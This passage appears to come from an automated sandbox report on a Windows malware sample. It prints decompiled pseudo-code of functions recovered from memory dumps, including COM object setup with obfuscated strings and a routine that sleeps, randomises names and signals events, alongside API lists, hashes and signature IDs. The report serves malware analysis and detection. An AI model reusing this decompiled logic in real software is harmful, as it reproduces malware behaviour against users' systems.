                                                                                                        • wsprintfW.USER32 ref: 709849B1
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,0079A25C,00000C04,00A65BE8), ref: 70984A24
                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 70984A49
                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,0000001E), ref: 70984A69
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70984A72
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70984A79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 39017707-0
                                                                                                        • Opcode ID: 8e3630173dfd05e426111f6d91a0b52dca8ce81b09d2a4a19f8b337f06f308c1
                                                                                                        • Instruction ID: 075d46cbb2a11a3b35c8fb8a072b0b50312e98b77ebec7dd173b49f80c8bfc50
                                                                                                        • Opcode Fuzzy Hash: 8e3630173dfd05e426111f6d91a0b52dca8ce81b09d2a4a19f8b337f06f308c1
                                                                                                        • Instruction Fuzzy Hash: A081C8B2A543047FE2149B65CC4AF7F76ACDF88B44F104519FE459A3D0E7B5A8008BA7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982AC0, Relevance: 42.3, APIs: 28, Instructions: 338memorycomstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 33%
                                                                                                        			E70982AC0() {
				intOrPtr _v56;
				char _v76;
				intOrPtr* _v100;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v132;
				intOrPtr* _v140;
				intOrPtr _v160;
				intOrPtr _v172;
				intOrPtr _v184;
				void* _v192;
				intOrPtr* _v200;
				intOrPtr _v208;
				intOrPtr _v212;
				char _v216;
				short _v220;
				intOrPtr* _v232;
				intOrPtr _v236;
				WCHAR* _v244;
				intOrPtr* _v252;
				void* _v256;
				intOrPtr* _v272;
				intOrPtr _v276;
				char _v288;
				intOrPtr* _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				short _v308;
				intOrPtr* _v312;
				intOrPtr* _v320;
				intOrPtr* _v324;
				char _v328;
				char _v336;
				intOrPtr* _v340;
				intOrPtr _v344;
				intOrPtr* _v352;
				intOrPtr _v356;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr* _v380;
				char _v384;
				intOrPtr* _v408;
				intOrPtr _v412;
				intOrPtr _v420;
				intOrPtr* _v424;
				char* _t88;
				void* _t90;
				intOrPtr* _t91;
				void* _t92;
				intOrPtr* _t93;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t100;
				intOrPtr* _t101;
				void* _t105;
				intOrPtr* _t106;
				void* _t108;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t114;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				char _t133;
				intOrPtr _t139;
				WCHAR* _t145;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t150;
				void* _t158;
				intOrPtr _t161;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr _t166;
				void* _t220;
				intOrPtr* _t221;
				void* _t223;
				WCHAR* _t226;
				intOrPtr _t228;
				void* _t230;
				WCHAR* _t232;
				intOrPtr* _t233;
				char _t235;

				_v56 = 0;
				__imp__CoInitializeEx(0, 6);
				_t88 =  &_v76;
				_v76 = 0;
				__imp__CoCreateInstance(0x7098d35c, 0, 1, 0x7098d28c, _t88);
				if(_t88 < 0) {
					return 0;
				} else {
					_t166 =  *0x7098f614; // 0x787680
					_t221 = __imp__#2;
					_v116 = 0;
					_t90 =  *_t221(_t166, _t220, _t158);
					_t230 = _t90;
					_t91 = _v100;
					_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0xc))))(_t91, _t230, 0, 0, 0, 0, 0, 0,  &_v120);
					__imp__#6(_t230);
					if(_t92 >= 0) {
						_t96 = _v160;
						__imp__CoSetProxyBlanket(_t96, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t96 >= 0) {
							_v184 = 0;
							_t100 =  *_t221(StrChrW(0x7098c638, 0x57));
							_push(0);
							_push( &_v192);
							_push(0);
							_t161 = _t100;
							_t101 = _v200;
							_push(0);
							_push(_t161);
							_push(_t101);
							_v172 = _t161;
							if( *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x18))))() >= 0) {
								_v208 = 0;
								_t105 =  *_t221(StrChrW(0x7098c60c, 0x57));
								_t223 = _t105;
								_t106 = _v232;
								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x18))))(_t106, _t223, 0, 0,  &_v216, 0);
								__imp__#6(_t223);
								if(_t108 >= 0) {
									_t111 = _v244;
									_push( &_v256);
									_v256 = 0;
									_push(0);
									_push(_t111);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x3c))))() >= 0) {
										_t163 = __imp__#8;
										 *_t163( &_v216);
										_v220 = 2;
										_v212 = 1;
										 *((intOrPtr*)( *((intOrPtr*)( *_v272 + 0x14))))(_v276, StrChrW(0x7098c5f4, 0x53), 0,  &_v220, 0);
										_push(0);
										_push( &_v288);
										_push(0);
										_v288 = 0;
										_push(StrChrW(0x7098c5e4, 0x43));
										_push(_v296);
										if( *((intOrPtr*)( *((intOrPtr*)( *_v292 + 0x4c))))() >= 0) {
											_t126 = _v312;
											_push( &_v328);
											_v328 = 0;
											_push(0);
											_push(_t126);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x3c))))() >= 0) {
												_t226 = _v244;
												if(_t226 != 0) {
													_t133 = lstrlenW(_t226) + 2;
													__imp__#4(_t226, _t133);
													_t235 = _t133;
													if(_t235 != 0) {
														 *_t163( &_v304);
														_v308 = 8;
														_v300 = _t235;
														 *((intOrPtr*)( *((intOrPtr*)( *_v352 + 0x14))))(_v356, StrChrW(0x7098c5c8, 0x43), 0,  &_v308, 0);
														_t139 = _v276;
														_t228 = 0;
														if(_t139 != 0) {
															__imp__#2(_t139);
															_t228 = _t139;
															if(_t228 != 0) {
																_v336 = 8;
																_v328 = _t228;
																_v340 =  *_v380;
																 *((intOrPtr*)( *((intOrPtr*)(_v344 + 0x14))))(_v384, StrChrW(0x7098c5a4, 0x43), 0,  &_v336, 0);
															}
														}
														 *_t163( &_v300);
														_v304 = 9;
														_v296 = _v372;
														 *((intOrPtr*)( *((intOrPtr*)( *_v380 + 0x14))))(_v384, StrChrW(0x7098c56c, 0x50), 0,  &_v304, 0);
														_v376 = 0;
														_t145 = StrChrW(0x7098c5e4, 0x43);
														__imp__#2(_t145);
														_t232 = _t145;
														_t146 = _v408;
														_t147 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x60))))(_t146, _v380, _t232, 0, 0, _v412,  &_v384, 0);
														_t233 = __imp__#6;
														_t165 = _t147;
														 *_t233(_t232);
														 *_t233(_t235);
														if(_t228 != 0) {
															 *_t233(_t228);
														}
														if(_t165 >= 0) {
															_t150 = _v424;
															 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 8))))(_t150);
															_v420 = 1;
														}
													}
												}
												_t130 = _v340;
												 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
											}
											_t128 = _v324;
											 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))(_t128);
										}
										_t124 = _v320;
										 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
									}
									_t114 = _v256;
									 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 8))))(_t114);
								}
								_t109 = _v252;
								 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 8))))(_t109);
								_t161 = _v236;
							}
							__imp__#6(_t161);
						}
						_t97 = _v192;
						 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))(_t97);
					}
					_t93 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
					return _v132;
				}
			}
























































































                                                                                                        0x70982acc
                                                                                                        0x70982ad0
                                                                                                        0x70982ad6
                                                                                                        0x70982ae8
                                                                                                        0x70982aec
                                                                                                        0x70982af4
                                                                                                        0x70982e46
                                                                                                        0x70982afa
                                                                                                        0x70982afa
                                                                                                        0x70982b02
                                                                                                        0x70982b09
                                                                                                        0x70982b0d
                                                                                                        0x70982b19
                                                                                                        0x70982b1b
                                                                                                        0x70982b27
                                                                                                        0x70982b2c
                                                                                                        0x70982b34
                                                                                                        0x70982b3a
                                                                                                        0x70982b49
                                                                                                        0x70982b51
                                                                                                        0x70982b64
                                                                                                        0x70982b6b
                                                                                                        0x70982b6d
                                                                                                        0x70982b72
                                                                                                        0x70982b73
                                                                                                        0x70982b74
                                                                                                        0x70982b76
                                                                                                        0x70982b7c
                                                                                                        0x70982b7d
                                                                                                        0x70982b7e
                                                                                                        0x70982b82
                                                                                                        0x70982b8a
                                                                                                        0x70982b97
                                                                                                        0x70982b9e
                                                                                                        0x70982ba7
                                                                                                        0x70982ba9
                                                                                                        0x70982bb5
                                                                                                        0x70982bba
                                                                                                        0x70982bc2
                                                                                                        0x70982bc8
                                                                                                        0x70982bd0
                                                                                                        0x70982bd1
                                                                                                        0x70982bd7
                                                                                                        0x70982bd8
                                                                                                        0x70982be0
                                                                                                        0x70982be6
                                                                                                        0x70982bf1
                                                                                                        0x70982c05
                                                                                                        0x70982c0a
                                                                                                        0x70982c24
                                                                                                        0x70982c2a
                                                                                                        0x70982c2f
                                                                                                        0x70982c30
                                                                                                        0x70982c33
                                                                                                        0x70982c43
                                                                                                        0x70982c48
                                                                                                        0x70982c4d
                                                                                                        0x70982c53
                                                                                                        0x70982c5b
                                                                                                        0x70982c5c
                                                                                                        0x70982c65
                                                                                                        0x70982c66
                                                                                                        0x70982c6b
                                                                                                        0x70982c71
                                                                                                        0x70982c77
                                                                                                        0x70982c84
                                                                                                        0x70982c89
                                                                                                        0x70982c8f
                                                                                                        0x70982c93
                                                                                                        0x70982cac
                                                                                                        0x70982cc2
                                                                                                        0x70982cc7
                                                                                                        0x70982cdd
                                                                                                        0x70982cdf
                                                                                                        0x70982ce3
                                                                                                        0x70982ce7
                                                                                                        0x70982cea
                                                                                                        0x70982cf0
                                                                                                        0x70982cf4
                                                                                                        0x70982d01
                                                                                                        0x70982d0d
                                                                                                        0x70982d1a
                                                                                                        0x70982d2d
                                                                                                        0x70982d2d
                                                                                                        0x70982cf4
                                                                                                        0x70982d34
                                                                                                        0x70982d45
                                                                                                        0x70982d53
                                                                                                        0x70982d69
                                                                                                        0x70982d72
                                                                                                        0x70982d7a
                                                                                                        0x70982d7d
                                                                                                        0x70982d97
                                                                                                        0x70982d99
                                                                                                        0x70982da5
                                                                                                        0x70982da8
                                                                                                        0x70982dae
                                                                                                        0x70982db0
                                                                                                        0x70982db3
                                                                                                        0x70982db7
                                                                                                        0x70982dba
                                                                                                        0x70982dba
                                                                                                        0x70982dbe
                                                                                                        0x70982dc0
                                                                                                        0x70982dca
                                                                                                        0x70982dcc
                                                                                                        0x70982dcc
                                                                                                        0x70982dbe
                                                                                                        0x70982c93
                                                                                                        0x70982dd4
                                                                                                        0x70982dde
                                                                                                        0x70982dde
                                                                                                        0x70982de0
                                                                                                        0x70982dea
                                                                                                        0x70982dea
                                                                                                        0x70982dec
                                                                                                        0x70982df6
                                                                                                        0x70982df6
                                                                                                        0x70982df8
                                                                                                        0x70982e02
                                                                                                        0x70982e02
                                                                                                        0x70982e04
                                                                                                        0x70982e0e
                                                                                                        0x70982e10
                                                                                                        0x70982e10
                                                                                                        0x70982e15
                                                                                                        0x70982e15
                                                                                                        0x70982e1b
                                                                                                        0x70982e25
                                                                                                        0x70982e25
                                                                                                        0x70982e27
                                                                                                        0x70982e31
                                                                                                        0x70982e3e
                                                                                                        0x70982e3e

                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 70982AD0
                                                                                                        • CoCreateInstance.OLE32(7098D35C,00000000,00000001,7098D28C,?), ref: 70982AEC
                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 70982B0D
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982B2C
                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 70982B49
                                                                                                        • StrChrW.SHLWAPI(7098C638,00000057), ref: 70982B68
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982B6B
                                                                                                        • StrChrW.SHLWAPI(7098C60C,00000057), ref: 70982B9B
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982B9E
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982BBA
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982BF1
                                                                                                        • StrChrW.SHLWAPI(7098C5F4), ref: 70982C19
                                                                                                        • StrChrW.SHLWAPI(7098C5E4,00000043,00000000,?,00000000), ref: 70982C3E
                                                                                                        • lstrlenW.KERNEL32(?), ref: 70982C7E
                                                                                                        • SysAllocStringLen.OLEAUT32(?,-00000002), ref: 70982C89
                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 70982CA1
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982CAC
                                                                                                        • StrChrW.SHLWAPI(7098C5C8,00000043,00000000,?,00000000), ref: 70982CD2
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70982CEA
                                                                                                        • StrChrW.SHLWAPI(7098C5A4,00000043,00000000,?,00000000), ref: 70982D1E
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70982D34
                                                                                                        • StrChrW.SHLWAPI(7098C56C,00000050,00000000,?,00000000), ref: 70982D5E
                                                                                                        • StrChrW.SHLWAPI(7098C5E4,00000043), ref: 70982D7A
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 70982D7D
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DB0
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DB3
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982DBA
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70982E15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree$InitVariant$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3932495391-0
                                                                                                        • Opcode ID: 7e638482a3abe852c80aaac8a80e8fd35eb52f2e0313453d4d0431c1dc2dd308
                                                                                                        • Instruction ID: 1665d9258b6a1b729005e24cf9e537130c3d6e1109b0b61ceb3c5d00fe77157d
                                                                                                        • Opcode Fuzzy Hash: 7e638482a3abe852c80aaac8a80e8fd35eb52f2e0313453d4d0431c1dc2dd308
                                                                                                        • Instruction Fuzzy Hash: C5B1F6B1608305AFD300DFA5CC84E5BBBE9AFC9704F10491DF6499B391DA75E905CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E9D17, Relevance: 38.6, APIs: 1, Strings: 21, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID: TM_GWin$TM_GWinJava$TM_GWout$TM_Gateway$TM_GatewayJava$TM_IPC$TM_MasterConnector$TM_None$TM_Ping$TM_PingIn$TM_PingMaster$TM_PingPerformance$TM_TVin$TM_TVout$TM_UDPin$TM_VPNin$TM_VPNout$TM_WaitAtGateway$TM_WaitAtGatewayServer$TM_Waiting$Unknown!!
                                                                                                        • API String ID: 431132790-2935159205
                                                                                                        • Opcode ID: 3d9806a0b5f6db1fa660415c8e4c9a69a78534da9da2194270566c7ef6890435
                                                                                                        • Instruction ID: 93746231d956421ea6bcc736ecdc08cc5a40495a40089226cd1b10749e16ca38
                                                                                                        • Opcode Fuzzy Hash: 3d9806a0b5f6db1fa660415c8e4c9a69a78534da9da2194270566c7ef6890435
                                                                                                        • Instruction Fuzzy Hash: 2F11CED068A2B6B345214D038DCFCFF5D56FF06BE3B204507780E251E499ED4A0AD5AB
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985640, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 121memorysleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 61%
                                                                                                        			E70985640(void* __ebp, intOrPtr _a4) {
				char _v268;
				long _v272;
				char _v276;
				void* __ebx;
				void* __edi;
				WCHAR* _t8;
				void* _t16;
				long _t21;
				WCHAR* _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				char* _t48;
				char* _t50;

				_t48 =  &_v268;
				_t43 = _a4;
				if( *0x7098f5bc != 0 || _t43 != 0) {
					E709843A0();
				}
				_push(_t32);
				_t41 = StrChrW;
				if( *0x7098f5f4 != 0 && ( *0x7098f5f0 != 0 || _t43 != 0)) {
					_push(1);
					_push(StrChrW(0x7098cbb8, 0x50));
					_t29 = StrChrW(0x7098cb94, 0x55);
					_t37 =  *0x7098f5f4; // 0x1
					_t30 =  *0x7098f5e4; // 0xa42bb0
					E70984F60(_t37, _t30, _t29);
					_t48 =  &(_t48[0x14]);
				}
				_push(0);
				_push(0);
				E709847A0(_t32, _t41);
				_t8 = StrChrW(0x7098c490, 0x2e);
				_t38 =  *0x7098f5cc; // 0xa4b6c8
				E70982EF0(_t38, _t8);
				_t50 =  &(_t48[0x10]);
				Sleep(0xfa0);
				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				if(_t44 != 0) {
					_v272 = GetTickCount();
					_t21 = RtlRandom( &_v272);
					_t36 =  *0x7098f5cc; // 0xa4b6c8
					_push(_t36);
					_push(0xa);
					_push(_t21);
					_push(_t36);
					wsprintfW(_t44, StrChrW(0x7098cb08, 0x2f));
					_push(0);
					_push(0);
					_push(0);
					E709844E0(0, StrChrW(0x7098caf4, 0x63), _t44);
					_t50 =  &(_t50[0x30]);
					HeapFree(GetProcessHeap(), 0, _t44);
				}
				_t35 =  *0x7098f62c; // 0x784250
				_push(0x4b);
				_push(_t35);
				_push(StrChrA(0x7098ca94, 0x47));
				wsprintfA( &_v276, StrChrA(0x7098ca8c, 0x25));
				_t16 = OpenEventA(2, 0,  &_v268);
				_t46 = _t16;
				if(_t46 != 0) {
					SetEvent(_t46);
					return CloseHandle(_t46);
				}
				return _t16;
			}
























                                                                                                        0x70985640
                                                                                                        0x7098564e
                                                                                                        0x70985655
                                                                                                        0x7098565b
                                                                                                        0x7098565b
                                                                                                        0x70985667
                                                                                                        0x70985669
                                                                                                        0x7098566f
                                                                                                        0x7098567e
                                                                                                        0x70985689
                                                                                                        0x70985691
                                                                                                        0x70985693
                                                                                                        0x7098569a
                                                                                                        0x709856a1
                                                                                                        0x709856a6
                                                                                                        0x709856a6
                                                                                                        0x709856a9
                                                                                                        0x709856ab
                                                                                                        0x709856ad
                                                                                                        0x709856bc
                                                                                                        0x709856be
                                                                                                        0x709856c6
                                                                                                        0x709856cb
                                                                                                        0x709856d3
                                                                                                        0x709856ef
                                                                                                        0x709856f3
                                                                                                        0x709856fb
                                                                                                        0x70985704
                                                                                                        0x7098570a
                                                                                                        0x70985710
                                                                                                        0x70985711
                                                                                                        0x70985713
                                                                                                        0x70985714
                                                                                                        0x70985720
                                                                                                        0x70985729
                                                                                                        0x7098572b
                                                                                                        0x7098572d
                                                                                                        0x7098573c
                                                                                                        0x70985741
                                                                                                        0x7098574a
                                                                                                        0x7098574a
                                                                                                        0x70985750
                                                                                                        0x7098575c
                                                                                                        0x7098575e
                                                                                                        0x70985768
                                                                                                        0x70985778
                                                                                                        0x7098578a
                                                                                                        0x70985790
                                                                                                        0x70985796
                                                                                                        0x70985799
                                                                                                        0x00000000
                                                                                                        0x709857a0
                                                                                                        0x709857ad

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CBB8,00000050,00000001,00000000,?,00000000), ref: 70985687
                                                                                                        • StrChrW.SHLWAPI(7098CB94,00000055,00000000), ref: 70985691
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E,?,00000000), ref: 709856BC
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 709856D3
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 709856E6
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709856E9
                                                                                                        • GetTickCount.KERNEL32 ref: 709856F5
                                                                                                        • RtlRandom.NTDLL ref: 70985704
                                                                                                        • StrChrW.SHLWAPI(7098CB08,0000002F,00A4B6C8,00000000,0000000A,00A4B6C8), ref: 7098571C
                                                                                                        • wsprintfW.USER32 ref: 70985720
                                                                                                        • StrChrW.SHLWAPI(7098CAF4,00000063,00000000,00000000,00000000,00000000), ref: 70985737
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70985747
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098574A
                                                                                                        • StrChrA.SHLWAPI(7098CA94,00000047,00784250,0000004B), ref: 70985766
                                                                                                        • StrChrA.SHLWAPI(7098CA8C,00000025,00000000), ref: 70985770
                                                                                                        • wsprintfA.USER32 ref: 70985778
                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 7098578A
                                                                                                        • SetEvent.KERNEL32(00000000), ref: 70985799
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 709857A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                        • String ID: PBx
                                                                                                        • API String ID: 1614445722-258745131
                                                                                                        • Opcode ID: 4ea5657da4d6afdb31fe07d1a548aeb91a6ef8b9237dbbec10aef7d63d2ad154
                                                                                                        • Instruction ID: e96548ed4e0955ddc3b70d8037e6aedea1933ec3feb692a22b5d82e401d9f273
                                                                                                        • Opcode Fuzzy Hash: 4ea5657da4d6afdb31fe07d1a548aeb91a6ef8b9237dbbec10aef7d63d2ad154
                                                                                                        • Instruction Fuzzy Hash: 5F31C9F7A54314BFE2206B61DC5EF6F366CEB44B15F204125FA05A63D1E6B068049AB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00542C1F, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 156fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _strcpy_s.LIBCMT ref: 00542C8B
                                                                                                        • __invoke_watson.LIBCMT ref: 00542C9C
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00899BD1,00000104), ref: 00542CB8
                                                                                                        • _strcpy_s.LIBCMT ref: 00542CCD
                                                                                                        • __invoke_watson.LIBCMT ref: 00542CE0
                                                                                                        • _strlen.LIBCMT ref: 00542CE9
                                                                                                        • _strlen.LIBCMT ref: 00542CF6
                                                                                                        • __invoke_watson.LIBCMT ref: 00542D23
                                                                                                        • _strcat_s.LIBCMT ref: 00542D36
                                                                                                        • __invoke_watson.LIBCMT ref: 00542D47
                                                                                                        • _strcat_s.LIBCMT ref: 00542D58
                                                                                                        • __invoke_watson.LIBCMT ref: 00542D69
                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77E34620,00000003,00542DEB,000000FC,0053719A,00000001,00000000,00000000,?,00540F49,?,00000001), ref: 00542D88
                                                                                                        • _strlen.LIBCMT ref: 00542DA9
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00540F49,?,00000001,?,00544586,00000018,007D5C28,0000000C,00544615,?), ref: 00542DB3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                        • API String ID: 1879448924-4022980321
                                                                                                        • Opcode ID: 454695e7e1730de792989708dfa0bb0e49f630240fa008d56e8c498ed93e3280
                                                                                                        • Instruction ID: c28fff97fb6c48bd908e1d9ce5ad649a62598dab0a6d10828c96ead0c9cd8cdd
                                                                                                        • Opcode Fuzzy Hash: 454695e7e1730de792989708dfa0bb0e49f630240fa008d56e8c498ed93e3280
                                                                                                        • Instruction Fuzzy Hash: A03146B29002363AFB2036215C4AFEF3E4CBB91768F840524FE09E11D7EA559D0684F1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C8504, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 441threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
